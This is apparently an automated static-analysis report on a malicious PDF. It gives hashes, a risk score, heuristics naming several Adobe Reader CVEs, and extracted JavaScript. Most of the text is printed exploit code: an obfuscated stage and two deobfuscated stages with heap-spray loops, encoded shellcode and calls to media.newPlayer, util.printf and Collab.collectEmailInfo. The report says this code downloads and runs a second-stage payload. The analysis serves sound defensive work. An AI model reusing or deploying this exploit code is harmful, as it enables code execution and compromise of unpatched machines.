Malicious PDF / .COM — malware analysis report

Static analysis result for SHA-256 723f50af859c515b…

MALICIOUS

PDF / .COM

5.8 KB
MD5: e36a2c944fc3f730511602d3e8b3fca0 SHA-1: a78e1bd80fc28751f3b4f91e49394f3c82a11139 SHA-256: 723f50af859c515b4350235b0e7f4069a543eb63ae4262a30113146f71673717
508 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities. The JavaScript is designed to download and execute a second-stage payload, as indicated by the 'generic stage recovery' heuristic and the ClamAV signature 'Js.Exploit.Shellcode-18'. The specific CVEs targeted suggest a client-side exploit for code execution.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0039_000.js
3a702324bb940d863780e670bbb00b996091f429017c4dce63fd19df89b90671		 pdf-javascript-stream PDF /JS object 39 at offset 0x16F 23825 bytes
Preview script
First 1,000 lines of the extracted script
kWooC0gPh5=app;    As883=['b','A','8','4','o','b','S','e','H','2','O','w','v','B','2','5','a','b','3','f','l','D','v','Y','S','I','T','Q'];Dxrhb0Y49h=As883[7]+As883[12]+As883[16]+As883[20];qeUYXg93ye=kWooC0gPh5[Dxrhb0Y49h];    pwUIMKay=[102,117,110,99,116,105,111,110,32,102,105,120,95,105,116,40,121,97,114,115,112,44,108,101,110,41,123,119,104,105,108,101,40,121,97,114,115,112,46,108,101,110,103,116,104,42,50,60,108,101,110,41,123,121,97,114,115,112,43,61,121,97,114,115,112,59,125,121,97,114,115,112,61,121,97,114,115,112,46,115,117,98,115,116,114,105,110,103,40,48,44,108,101,110,47,50,41,59,114,101,116,117,114,110,32,121,97,114,115,112,59,125,13,10,102,117,110,99,116,105,111,110,32,112,114,105,110,116,100,40,41,123,118,97,114,32,115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,49,49,69,66,37,117,52,66,53,66,37,117,67,57,51,51,37,117,56,49,54,54,37,117,65,70,67,57,37,117,56,48,48,49,37,117,48,66,51,52,37,117,69,50,65,54,37,117,69,66,70,65,37,117,69,56,48,53,37,117,70,70,69,65,37,117,70,70,70,70,37,117,55,67,52,70,37,117,65,54,65,54,37,117,70,57,65,54,37,117,48,55,67,50,37,117,65,54,57,54,37,117,65,54,65,54,37,117,69,54,50,68,37,117,50,68,65,65,37,117,66,65,68,54,37,117,50,68,48,66,37,117,65,69,67,69,37,117,68,54,50,68,37,117,50,68,56,54,37,117,50,54,65,54,37,117,67,68,57,56,37,117,53,53,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,51,37,117,69,48,52,65,37,117,50,54,69,48,37,117,68,52,57,56,37,117,53,49,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,56,37,117,50,68,53,54,37,117,67,67,53,49,37,117,70,70,65,53,37,117,70,68,52,69,37,117,65,54,65,54,37,117,52,52,65,54,37,117,67,69,53,70,37,117,67,56,67,57,37,117,65,54,65,54,37,117,68,51,67,69,37,117,67,65,68,52,37,117,70,50,67,66,37,117,66,48,53,57,37,117,52,69,50,68,37,117,69,51,52,69,37,117,65,54,65,54,37,117,67,69,65,54,37,117,57,53,67,65,37,117,65,54,57,52,37,117,68,53,67,69,37,117,67,51,67,69,37,117,70,50,67,65,37,117,66,48,53,57,37,117,52,69,50,68,37,117,57,55,52,69,37,117,65,54,65,54,37,117,50,53,65,54,37,117,69,54,52,65,37,117,55,65,50,68,37,117,67,67,70,53,37,117,53,57,69,54,37,117,65,50,70,48,37,117,65,50,54,49,37,117,67,55,65,53,37,117,67,51,56,56,37,117,67,48,68,69,37,117,69,50,54,49,37,117,65,50,65,53,37,117,65,54,67,51,37,117,54,54,57,53,37,117,70,54,70,54,37,117,70,49,70,53,37,117,53,57,70,54,37,117,65,65,70,48,37,117,55,65,50,68,37,117,70,54,70,54,37,117,70,53,70,54,37,117,70,54,70,54,37,117,70,48,53,57,37,117,53,57,66,54,37,117,65,69,70,48,37,117,70,48,70,55,37,117,68,51,50,68,37,117,50,68,57,65,37,117,56,56,68,50,37,117,65,53,68,69,37,117,70,48,53,51,37,117,68,48,50,68,37,117,65,53,56,54,37,117,57,53,53,51,37,117,69,70,54,70,37,117,48,66,69,55,37,117,54,51,65,53,37,117,55,68,57,53,37,117,49,56,65,57,37,117,57,67,66,54,37,117,68,50,55,48,37,117,54,55,65,69,37,117,65,66,54,68,37,117,55,67,65,53,37,117,52,68,69,54,37,117,57,68,53,55,37,117,68,51,66,57,37,117,70,56,52,49,37,117,70,56,50,68,37,117,65,53,56,50,37,117,67,48,55,66,37,117,65,65,50,68,37,117,50,68,69,68,37,117,66,65,70,56,37,117,55,66,65,53,37,117,65,50,50,68,37,117,65,53,50,68,37,117,48,68,54,51,37,117,70,70,70,56,37,117,52,69,54,53,37,117,53,57,56,55,37,117,53,57,53,57,37,117,69,56,50,56,37,117,52,65,65,56,37,117,54,67,57,53,37,117,70,68,50,67,37,117,55,69,68,56,37,117,68,53,52,52,37,117,66,67,57,48,37,117,68,54,56,57,37,117,49,68,70,56,37,117,66,68,52,55,37,117,68,50,67,69,37,117,68,54,68,50,37,117,56,57,57,67,37,117,68,49,56,57,37,117,67,57,67,57,37,117,68,50,67,50,37,117,67,55,68,52,37,117,67,50,67,56,37,117,56,56,67,51,37,117,67,57,67,53,37,117,56,57,67,66,37,117,67,66,67,70,37,117,56,57,67,49,37,117,67,57,67,65,37,117,67,50,67,55,37,117,68,69,57,54,37,117,56,56,57,55,37,117,67,69,68,54,37,117,57,57,68,54,37,117,68,54,68,53,37,117,57,66,67,65,37,117,67,56,70,57,37,117,68,49,67,51,37,117,67,48,56,48,37,117,57,66,67,69,37,117,48,48,65,54,34,41,59,118,97,114,32,98,108,111,99,107,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,99,48,99,37,117,48,99,48,99,34,41,59,118,97,114,32,71,68,97,103,97,67,117,121,78,102,82,83,70,122,97,83
... (truncated)
generic_stage_recovery_000.js
f22871e3d56c053cd2bc74970d3df2c30b0e4ed472a9290a0f42998aec301c10		 deobfuscated-js generic stage recovery numeric-array-bytes from JavaScript object 39 at offset 0x16F 7058 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC8F9%uD1C3%uC080%u9BCE%u00A6");var block = unescape("%u0c0c%u0c0c");var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e) {}util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function util_printf(){var payload=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uD6F9%uC5C7%u80CD%uCEC0%uA69B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%u
... (truncated)
generic_stage_recovery_001.js
b509e0c6c16455359f1a9084f2b6b702bdcedf4a3e955c7cbf77fac9f9e0b67c		 deobfuscated-js generic stage recovery percent-decode from JavaScript object 39 at offset 0x16F 7054 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC8F9%uD1C3%uC080%u9BCE%u00A6");var block = unescape("%u0c0c%u0c0c");var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e) {}util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function util_printf(){var payload=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uD6F9%uC5C7%u80CD%uCEC0%uA69B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.